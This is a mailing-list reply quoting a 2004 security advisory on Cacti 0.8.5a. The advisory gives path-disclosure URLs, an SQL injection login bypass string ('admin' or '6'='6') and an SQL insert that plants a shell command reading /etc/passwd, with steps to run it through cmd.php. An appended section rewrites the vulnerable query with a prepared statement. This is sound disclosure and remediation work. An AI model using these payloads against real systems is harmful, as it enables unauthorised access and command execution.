Does this work on 0.8.5? I tried it and was unsuccessful. Thanks.

Andy

On Monday 16 August 2004 01:11 pm, Fernando Quintero wrote:
> /////////////////////////////////////////////////////
> //// Vulnerable Program: CACTI
> ////
> //// Version : The latest version 0.8.5a
> ////
> //// Url: http://www.raxnet.net
> ////
> //// The Bug: SQL injection that allows bypassing the auth.
> ////
> //// Date: Today, August 16 of 2004
> ////
> //// Author: Fernando Quintero (a.k.a nonroot)
> //// Email: nando@xxxxxxxxxxx
> //////////////////////////////////////////////////////
>
> I. Affected software description:
>
> Cacti is a complete frontend to RRDTool; it stores all of the necessary
> information to create graphs and populate them with data in a MySQL
> database. The frontend is completely PHP driven. Along with being able
> to maintain Graphs, Data Sources, and Round Robin Archives in a
> database, cacti handles the data gathering. There is also SNMP support
> for those used to creating traffic graphs with MRTG.
>
> II. The Bugs
>
> a) Full path disclosure
>
> In several parts of the code, when anyone tries to open files in
> directories that are not normally reached directly, like include, lib,
> scripts, etc., an error appears that reveals the path where the program
> is installed. For example:
>
> http://127.0.0.1/cacti/include/auth.php
> http://127.0.0.1/cacti/auth_login.php?action=login
> http://127.0.0.1/cacti2/auth_changepassword.php?ref=index
> php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save
>
> These are low risk bugs, but they still allow a possible attacker to
> obtain data about the remote system.
>
> b) SQL injection and bypass of the authentication.
>
> Code injection is possible in the index.php file to pass auth. When
> the username and the password are evaluated by auth_login.php, anyone
> can insert this:
>
> username = admin' or '6'='6
> password = password wished
>
> Where 'admin' is a valid user in cacti, the system allows this input
> and changes the password immediately.
> This is the code:
>
> //auth_login.php
> // line 33 ~
>
> switch ($_REQUEST["action"]) {
> case 'login':
>     /* --- UPDATE old password with new md5 password value */
>     db_execute("update user_auth set password = '" . md5($_POST["password"])
>         . "' where username='" . $_POST["username"]
>         . "' and password = PASSWORD('" . $_POST["password"] . "')");
>
> So 'username' and 'password' can still be injected; this would not be
> possible if the variable 'magic_quotes_gpc' were set to 'On' in the
> php.ini file of the system.
>
> Here is where Debian enters. I tested it in SID with the latest version
> of cacti. When it is installed, a configuration file called cacti.conf
> is created in the conf.d path of apache. This file contains the
> following information:
>
> ---BEGIN----
>
> Alias /cacti /usr/share/cacti
>
> <DirectoryMatch /usr/share/cacti/>
>     Options +FollowSymLinks
>     AllowOverride None
>     order allow,deny
>     allow from all
>     <IfModule mod_php4.c>
>         AddType application/x-httpd-php .php
>         php_flag magic_quotes_gpc Off
>         php_flag short_open_tag On
>         php_flag register_globals On
>         php_flag register_argc_argv On
>         php_flag track_vars On
>         php_value include_path .
>         DirectoryIndex index.php
>     </IfModule>
> </DirectoryMatch>
>
> -----END----
>
> magic_quotes_gpc is set to Off in the line:
>
> php_flag magic_quotes_gpc Off
>
> In this way, everything needed to carry out a successful attack is
> available. Using this attack, I was able to inject some code into the
> table 'data_input_data_cache', and it allowed me to execute a command
> on the system with the permissions of the user who runs apache.
>
> A possible example for this is:
>
> insert into data_input_data_cache (local_data_id, host_id,
> data_input_id, action, command, hostname, snmp_community,
> snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
> rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
> values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
> script', '127.0.0.1', '', '1', '', '', '161', '500',
> 'hack', '/', '3', 'NULL', 'NULL', 'NULL');
>
> Then point to http://127.0.0.1/cacti/cmd.php and the command will be
> executed.
>
> III. SOLUTION:
>
> The coders were contacted and the code was fixed in the cvs ;).
> The maintainer of cacti was contacted too.
>
> IV. GREETINGS
>
> - Greets to all the community. I learn from you!
> - Silence Team and the GIGAX Staff.
>
> V. CONTACT
>
> Fernando Quintero
> nando@xxxxxxxxxxx
> Silence Team
>
> VI. FINAL WORDS
>
> - Many applications could be vulnerable with the default configuration
> of debian, check it!
>
> - Sorry for the English, so !! Viva COLOMBIA !!
>
> Fernando Quintero
> Silence Team
> Colombia - South America
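The UPDATE quoted in the advisory, rewritten with a prepared statement as an added example (this is not Cacti's code and not part of the advisory): the driver sends the username and password as bound values, separate from the SQL text, so a quote inside the username can no longer turn the WHERE clause into a tautology, and whether magic_quotes_gpc is On or Off stops mattering for this query. It assumes a mysqli connection $db and only the user_auth columns the advisory names (username, password).

```php
<?php
// Added example, not Cacti's code: the legacy-hash migration step from
// auth_login.php done with a prepared statement instead of string
// concatenation. Assumes a connected mysqli object $db and a user_auth
// table with the columns username and password, as in the advisory.

/**
 * Re-hash a user's password from MySQL PASSWORD() to md5 at login time.
 * Returns the number of rows changed: 1 for a real username/password
 * pair, 0 otherwise. The original code could match every row when the
 * username contained "' or '6'='6"; here that string is just a username.
 */
function migrate_legacy_password_hash(mysqli $db, string $username, string $password): int
{
    // Refuse empty fields up front; the original trusted $_POST blindly.
    if ($username === '' || $password === '') {
        return 0;
    }

    // Placeholders instead of "..." . $_POST[...] . "...": the values are
    // never parsed as SQL, so escaping (magic_quotes_gpc) is irrelevant.
    // PASSWORD() is kept to match the advisory's schema; note that MySQL 8
    // removed the function, so this only applies to the 2004-era setup.
    $stmt = $db->prepare(
        'UPDATE user_auth SET password = ? WHERE username = ? AND password = PASSWORD(?)'
    );
    if ($stmt === false) {
        return 0;
    }

    $newHash = md5($password); // md5 only because that is the advisory's target format
    $stmt->bind_param('sss', $newHash, $username, $password);
    $stmt->execute();

    // More than one affected row would mean the WHERE clause matched more
    // than the one intended account; treat that as a failure, not a success.
    $changed = $stmt->affected_rows;
    $stmt->close();
    return $changed === 1 ? 1 : 0;
}

// Caller side, reading the two fields the advisory's request carries.
if (($_REQUEST['action'] ?? '') === 'login') {
    $changed = migrate_legacy_password_hash($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
}
```

The same pattern applies to the data_input_data_cache insert the advisory mentions: once no query on the page is built by concatenating request data, the Debian magic_quotes_gpc setting is no longer what stands between a request and the database.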